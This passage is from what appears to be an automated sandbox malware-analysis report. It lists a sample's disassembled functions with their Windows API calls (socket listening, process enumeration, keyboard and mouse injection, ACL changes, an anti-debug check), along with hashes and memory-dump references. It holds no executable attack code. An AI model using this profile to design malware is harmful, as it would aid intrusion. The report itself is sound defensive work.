                                                                                                • Opcode Fuzzy Hash: e998af62085c6697935ed50d35c6a1543144275e53dff9101095b3913992069c
                                                                                                • Instruction Fuzzy Hash: F221C971640205ABF7108FA4EC4EF7FB3ACE708702F144569FE09D51D1D6BA5D408765
                                                                                                Function 00446124 Relevance: 16.7, APIs: 11, Instructions: 182COMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                  • Part of subcall function 00436E2B: GetUserObjectSecurity.USER32(?,?,?,00000000,?), ref: 00436E45
                                                                                                  • Part of subcall function 00436E2B: GetLastError.KERNEL32(?,00000000,?), ref: 00436E4F
                                                                                                  • Part of subcall function 00436E2B: GetUserObjectSecurity.USER32(?,?,00000000,?,?), ref: 00436E75
                                                                                                  • Part of subcall function 00436DF7: InitializeSecurityDescriptor.ADVAPI32(00000000,00000001), ref: 00436E12
                                                                                                • GetSecurityDescriptorDacl.ADVAPI32(?,?,?,?), ref: 0044618A
                                                                                                • GetAclInformation.ADVAPI32(?,?,0000000C,00000002), ref: 004461BE
                                                                                                • GetLengthSid.ADVAPI32(?), ref: 004461D0
                                                                                                • GetAce.ADVAPI32(?,00000000,?), ref: 0044620D
                                                                                                • AddAce.ADVAPI32(?,00000002,000000FF,?,?), ref: 00446229
                                                                                                • GetLengthSid.ADVAPI32(?), ref: 00446241
                                                                                                • GetLengthSid.ADVAPI32(?,00000008,?), ref: 0044626A
                                                                                                • CopySid.ADVAPI32(00000000), ref: 00446271
                                                                                                • AddAce.ADVAPI32(?,00000002,000000FF,00000000,?), ref: 004462A3
                                                                                                • SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000), ref: 004462C5
                                                                                                • SetUserObjectSecurity.USER32(?,00000004,?), ref: 004462D8
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.2150829891.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000000.00000002.2150808731.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150901559.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150925288.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150945840.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150965974.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150965974.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2151032045.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_jpdy1E8K4A.jbxd
                                                                                                Similarity
                                                                                                • API ID: Security$DescriptorLengthObjectUser$Dacl$CopyErrorInformationInitializeLast
                                                                                                • String ID:
                                                                                                • API String ID: 1255039815-0
                                                                                                • Opcode ID: cf498e736c0040d611dc61921388a4e783ba54ad69564fff20abd6321b712b19
                                                                                                • Instruction ID: cbecfdc94e872455e881353a2ef69e95113e06a92746e25f2a634f38edc45108
                                                                                                • Opcode Fuzzy Hash: cf498e736c0040d611dc61921388a4e783ba54ad69564fff20abd6321b712b19
                                                                                                • Instruction Fuzzy Hash: C251BC71A00209BBEB10EFA1CD84EEFB778BF49704F01855EF515A7241D6B8DA05CB69
                                                                                                Function 0043305F Relevance: 16.6, APIs: 11, Instructions: 122COMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                • __swprintf.LIBCMT ref: 00433073
                                                                                                • __swprintf.LIBCMT ref: 00433085
                                                                                                • __wcsicoll.LIBCMT ref: 00433092
                                                                                                • FindResourceW.KERNEL32(?,?,0000000E), ref: 004330A5
                                                                                                • LoadResource.KERNEL32(?,00000000), ref: 004330BD
                                                                                                • LockResource.KERNEL32(00000000), ref: 004330CA
                                                                                                • FindResourceW.KERNEL32(?,?,00000003), ref: 004330F7
                                                                                                • LoadResource.KERNEL32(?,00000000), ref: 00433105
                                                                                                • SizeofResource.KERNEL32(?,00000000), ref: 00433114
                                                                                                • LockResource.KERNEL32(?), ref: 00433120
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.2150829891.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000000.00000002.2150808731.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150901559.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150925288.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150945840.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150965974.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150965974.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2151032045.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_jpdy1E8K4A.jbxd
                                                                                                Similarity
                                                                                                • API ID: Resource$FindLoadLock__swprintf$Sizeof__wcsicoll
                                                                                                • String ID:
                                                                                                • API String ID: 1158019794-0
                                                                                                • Opcode ID: b140e135c5f727b40d296f2f4b3108eaeb1a217ee9fa6a28346dce69b8385e70
                                                                                                • Instruction ID: 48d2d5a3af9b637b7fc6f2c6b5a7fdd3517197a5f8dc2ef3994740021b7ed835
                                                                                                • Opcode Fuzzy Hash: b140e135c5f727b40d296f2f4b3108eaeb1a217ee9fa6a28346dce69b8385e70
                                                                                                • Instruction Fuzzy Hash: C741F1322002146BDB10EF65EC84FAB37ADEB89321F00846BFD01C6245E779DA51C7A8
                                                                                                Function 0045A10F Relevance: 16.6, APIs: 11, Instructions: 120clipboardmemoryCOMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.2150829891.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000000.00000002.2150808731.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150901559.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150925288.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150945840.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150965974.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150965974.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2151032045.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_jpdy1E8K4A.jbxd
                                                                                                Similarity
                                                                                                • API ID: Clipboard$AllocCloseEmptyGlobalOpen
                                                                                                • String ID:
                                                                                                • API String ID: 1737998785-0
                                                                                                • Opcode ID: bc1c5a0e04e7211697dd638385d424d337038878635646daacac479226a8eb74
                                                                                                • Instruction ID: d84b136cee2c902db59abfe4f82a3f409d39725fe24efd6a62fd8a04edebb5dd
                                                                                                • Opcode Fuzzy Hash: bc1c5a0e04e7211697dd638385d424d337038878635646daacac479226a8eb74
                                                                                                • Instruction Fuzzy Hash: 334114726001119FC310EFA5EC89B5EB7A4FF54315F00856EF909EB3A1EB75A941CB88
                                                                                                Function 0045D619 Relevance: 15.9, APIs: 4, Strings: 5, Instructions: 107COMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                • SetErrorMode.KERNEL32(00000001), ref: 0045D627
                                                                                                • GetDiskFreeSpaceW.KERNEL32(?,?,?,?,?,?), ref: 0045D6B5
                                                                                                • GetLastError.KERNEL32 ref: 0045D6BF
                                                                                                • SetErrorMode.KERNEL32(00000000,?), ref: 0045D751
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.2150829891.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000000.00000002.2150808731.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150901559.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150925288.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150945840.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150965974.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150965974.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2151032045.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_jpdy1E8K4A.jbxd
                                                                                                Similarity
                                                                                                • API ID: Error$Mode$DiskFreeLastSpace
                                                                                                • String ID: INVALID$NOTREADY$READONLY$READY$UNKNOWN
                                                                                                • API String ID: 4194297153-14809454
                                                                                                • Opcode ID: 7585e308607772b0055f7746bf91c511cc03d2319b95ee688ecb5d1da683c46d
                                                                                                • Instruction ID: 1f300c266cb1daf6abeae651b696e439ee3a0372042695327ab67fb83666ce96
                                                                                                • Opcode Fuzzy Hash: 7585e308607772b0055f7746bf91c511cc03d2319b95ee688ecb5d1da683c46d
                                                                                                • Instruction Fuzzy Hash: FE418235D00209DFCB10EFA5C884A9DB7B4FF48315F10846BE905AB352D7799A85CB69
                                                                                                Function 0044EB5F Relevance: 12.9, APIs: 3, Strings: 4, Instructions: 643COMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.2150829891.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000000.00000002.2150808731.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150901559.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150925288.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150945840.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150965974.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150965974.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2151032045.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_jpdy1E8K4A.jbxd
                                                                                                Similarity
                                                                                                • API ID: _memmove$_strncmp
                                                                                                • String ID: @oH$\$^$h
                                                                                                • API String ID: 2175499884-3701065813
                                                                                                • Opcode ID: 988809b36a944a9929e300e154a4cfc85b4d4f50dea7e6e4a67b5f519bc2876c
                                                                                                • Instruction ID: 796dcd1322dc9123c5f4e5533c800aedaabe8dca19c5b95ba0af32eff2573e22
                                                                                                • Opcode Fuzzy Hash: 988809b36a944a9929e300e154a4cfc85b4d4f50dea7e6e4a67b5f519bc2876c
                                                                                                • Instruction Fuzzy Hash: 4242E170E04249CFEB14CF69C8806AEBBF2FF85304F2481AAD856AB351D7399946CF55
                                                                                                Function 004652BE Relevance: 12.1, APIs: 8, Instructions: 97networkCOMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                • socket.WSOCK32(00000002,00000001,00000006,00000000), ref: 0046530D
                                                                                                • WSAGetLastError.WSOCK32(00000000), ref: 0046531C
                                                                                                • bind.WSOCK32(00000000,?,00000010), ref: 00465356
                                                                                                • WSAGetLastError.WSOCK32(00000000), ref: 00465363
                                                                                                • closesocket.WSOCK32(00000000,00000000), ref: 00465377
                                                                                                • listen.WSOCK32(00000000,00000005), ref: 00465381
                                                                                                • WSAGetLastError.WSOCK32(00000000), ref: 004653A9
                                                                                                • closesocket.WSOCK32(00000000,00000000), ref: 004653BD
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.2150829891.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000000.00000002.2150808731.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150901559.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150925288.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150945840.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150965974.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150965974.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2151032045.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_jpdy1E8K4A.jbxd
                                                                                                Similarity
                                                                                                • API ID: ErrorLast$closesocket$bindlistensocket
                                                                                                • String ID:
                                                                                                • API String ID: 540024437-0
                                                                                                • Opcode ID: 56b395d1b7441155ee1d78469f99a9871a9e2360f64803e3ab449944eb02724f
                                                                                                • Instruction ID: 689f190a2b8ca197395c4559ba4ec64c13dad074e2778b61c05f6be918bdb8b0
                                                                                                • Opcode Fuzzy Hash: 56b395d1b7441155ee1d78469f99a9871a9e2360f64803e3ab449944eb02724f
                                                                                                • Instruction Fuzzy Hash: A8319331200500ABD310EF25DD89B6EB7A8EF44725F10866EF855E73D1DBB4AC818B99
                                                                                                Function 0044663B Relevance: 11.4, APIs: 1, Strings: 5, Instructions: 895COMMON
                                                                                                Download Yara Rule
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.2150829891.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000000.00000002.2150808731.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150901559.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150925288.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150945840.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150965974.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150965974.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2151032045.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_jpdy1E8K4A.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: ERCP$VUUU$VUUU$VUUU$XjH
                                                                                                • API String ID: 0-2872873767
                                                                                                • Opcode ID: 34fecdbc504fccc055e136d4951117c2a740426f4eee1b738e863fbded63ce7f
                                                                                                • Instruction ID: d175e7d0ae6fb3d700f9da8fb6b70819649eb02c4ceaf458d011f7582104736e
                                                                                                • Opcode Fuzzy Hash: 34fecdbc504fccc055e136d4951117c2a740426f4eee1b738e863fbded63ce7f
                                                                                                • Instruction Fuzzy Hash: D772D871A042198BEF24CF58C8807AEB7F1EB42314F25829BD859A7380D7799DC5CF5A
                                                                                                Function 004755C4 Relevance: 10.6, APIs: 7, Instructions: 148processCOMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                • CreateToolhelp32Snapshot.KERNEL32 ref: 00475608
                                                                                                • Process32FirstW.KERNEL32(00000000,0000022C), ref: 00475618
                                                                                                • __wsplitpath.LIBCMT ref: 00475644
                                                                                                  • Part of subcall function 00413A0E: __wsplitpath_helper.LIBCMT ref: 00413A50
                                                                                                • _wcscat.LIBCMT ref: 00475657
                                                                                                • __wcsicoll.LIBCMT ref: 0047567B
                                                                                                • Process32NextW.KERNEL32(00000000,?), ref: 004756AB
                                                                                                • CloseHandle.KERNEL32(00000000), ref: 004756BA
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.2150829891.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000000.00000002.2150808731.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150901559.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150925288.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150945840.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150965974.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150965974.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2151032045.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_jpdy1E8K4A.jbxd
                                                                                                Similarity
                                                                                                • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32__wcsicoll__wsplitpath__wsplitpath_helper_wcscat
                                                                                                • String ID:
                                                                                                • API String ID: 2547909840-0
                                                                                                • Opcode ID: 9e44ac92eedd99fdf3f2932738b6949334d3f24a3592eb41664da5fdf167909f
                                                                                                • Instruction ID: 52239f647ae7113ca4c6e3167181772f82882466072c53a1302db900a9aecbbd
                                                                                                • Opcode Fuzzy Hash: 9e44ac92eedd99fdf3f2932738b6949334d3f24a3592eb41664da5fdf167909f
                                                                                                • Instruction Fuzzy Hash: B3518671900618ABDB10DF55CD85FDE77B8EF44704F1084AAF509AB282DA75AF84CF68
                                                                                                Function 00452492 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 128filesleepCOMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                  • Part of subcall function 00401B10: _wcslen.LIBCMT ref: 00401B11
                                                                                                  • Part of subcall function 00401B10: _memmove.LIBCMT ref: 00401B57
                                                                                                • FindFirstFileW.KERNEL32(?,?), ref: 004524DF
                                                                                                • Sleep.KERNEL32(0000000A), ref: 0045250B
                                                                                                • FindNextFileW.KERNEL32(?,?), ref: 004525E9
                                                                                                • FindClose.KERNEL32(?), ref: 004525FF
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.2150829891.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000000.00000002.2150808731.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150901559.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150925288.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150945840.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150965974.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150965974.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2151032045.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_jpdy1E8K4A.jbxd
                                                                                                Similarity
                                                                                                • API ID: Find$File$CloseFirstNextSleep_memmove_wcslen
                                                                                                • String ID: *.*$\VH
                                                                                                • API String ID: 2786137511-2657498754
                                                                                                • Opcode ID: 952b61541a12346a9a2631e93aef0720ba9757898c7ad2f9180af277910d7a38
                                                                                                • Instruction ID: de376bcde865418ddd8e10142a6165d1fec8b8ecf5afc9fd422e88b207ce0255
                                                                                                • Opcode Fuzzy Hash: 952b61541a12346a9a2631e93aef0720ba9757898c7ad2f9180af277910d7a38
                                                                                                • Instruction Fuzzy Hash: 37417F7190021DABDB14DF64CD58AEE77B4AF49305F14445BEC09A3281E678EE49CB98
                                                                                                Function 0041A208 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 58COMMONLIBRARYCODE
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                • IsDebuggerPresent.KERNEL32 ref: 00421FC1
                                                                                                • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 00421FD6
                                                                                                • UnhandledExceptionFilter.KERNEL32(pqI), ref: 00421FE1
                                                                                                • GetCurrentProcess.KERNEL32(C0000409), ref: 00421FFD
                                                                                                • TerminateProcess.KERNEL32(00000000), ref: 00422004
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.2150829891.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000000.00000002.2150808731.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150901559.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150925288.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150945840.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150965974.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150965974.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2151032045.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_jpdy1E8K4A.jbxd
                                                                                                Similarity
                                                                                                • API ID: ExceptionFilterProcessUnhandled$CurrentDebuggerPresentTerminate
                                                                                                • String ID: pqI
                                                                                                • API String ID: 2579439406-2459173057
                                                                                                • Opcode ID: 25dc777f16e4295b66819c01749bb17431433dcbcd396824bac5e12fb106518c
                                                                                                • Instruction ID: 2caf929301e55fbdfba35cdc3931bb3174c20cf3198a7c5bb5494214f042e870
                                                                                                • Opcode Fuzzy Hash: 25dc777f16e4295b66819c01749bb17431433dcbcd396824bac5e12fb106518c
                                                                                                • Instruction Fuzzy Hash: 9E21CDB45392059FCB50DF65FE456483BA4BB68304F5005BBF90987371E7B969818F0D
                                                                                                Function 0043333C Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 40COMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                • __wcsicoll.LIBCMT ref: 00433349
                                                                                                • mouse_event.USER32(00000800,00000000,00000000,00000078,00000000), ref: 0043335F
                                                                                                • __wcsicoll.LIBCMT ref: 00433375
                                                                                                • mouse_event.USER32(00000800,00000000,00000000,00000088,00000000), ref: 0043338B
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.2150829891.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000000.00000002.2150808731.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150901559.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150925288.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150945840.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150965974.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150965974.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2151032045.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_jpdy1E8K4A.jbxd
                                                                                                Similarity
                                                                                                • API ID: __wcsicollmouse_event
                                                                                                • String ID: DOWN
                                                                                                • API String ID: 1033544147-711622031
                                                                                                • Opcode ID: 3af7a305a716ba131119f47d61043d9bc75f7fbd5de0530911e4e2de0579c383
                                                                                                • Instruction ID: c5effa3e7e2998e6ee15a8e10ce6e2e5d36a5fc043d4170c53cc9f091e4fe068
                                                                                                • Opcode Fuzzy Hash: 3af7a305a716ba131119f47d61043d9bc75f7fbd5de0530911e4e2de0579c383
                                                                                                • Instruction Fuzzy Hash: 78F0A0726846103AF80026947C02EFB334C9B26767F004023FE0CD1280EA59290557BD
                                                                                                Function 0044C37A Relevance: 7.6, APIs: 5, Instructions: 145windowkeyboardCOMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                • GetKeyboardState.USER32(?), ref: 0044C3D2
                                                                                                • SetKeyboardState.USER32(00000080), ref: 0044C3F6
                                                                                                • PostMessageW.USER32(00000000,00000101,?,?), ref: 0044C43A
                                                                                                • PostMessageW.USER32(00000000,00000105,?,?), ref: 0044C472
                                                                                                • SendInput.USER32(00000001,?,0000001C), ref: 0044C4FF
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.2150829891.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000000.00000002.2150808731.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150901559.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150925288.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150945840.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150965974.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150965974.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2151032045.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_jpdy1E8K4A.jbxd
                                                                                                Similarity
                                                                                                • API ID: KeyboardMessagePostState$InputSend
                                                                                                • String ID:
                                                                                                • API String ID: 3031425849-0
                                                                                                • Opcode ID: 0ab52cc7f1a00f618f34bf6b1006ae93bda3478e58ada741bb1ac89fd44d8d1c
                                                                                                • Instruction ID: ca9f4cb769efad0e1be190fe8763212e5a79bd7c4ee8908ff6f5a5d8a4a0dc9b
                                                                                                • Opcode Fuzzy Hash: 0ab52cc7f1a00f618f34bf6b1006ae93bda3478e58ada741bb1ac89fd44d8d1c
                                                                                                • Instruction Fuzzy Hash: 4D415D755001082AEB109FA9DCD5BFFBB68AF96320F04815BFD8456283C378D9518BF8
                                                                                                Function 00476619 Relevance: 7.6, APIs: 5, Instructions: 140networkCOMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                  • Part of subcall function 00465225: inet_addr.WSOCK32(?), ref: 00465249
                                                                                                • socket.WSOCK32(00000002,00000002,00000011,?,00000000), ref: 0047666F
                                                                                                • WSAGetLastError.WSOCK32(00000000), ref: 00476692
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.2150829891.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000000.00000002.2150808731.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150901559.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150925288.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150945840.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150965974.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150965974.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2151032045.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_jpdy1E8K4A.jbxd
                                                                                                Similarity
                                                                                                • API ID: ErrorLastinet_addrsocket
                                                                                                • String ID:
                                                                                                • API String ID: 4170576061-0
                                                                                                • Opcode ID: beba4ad3326242fe02a37a331f69581919bdb462f679bf8c0e3d41d719e28549
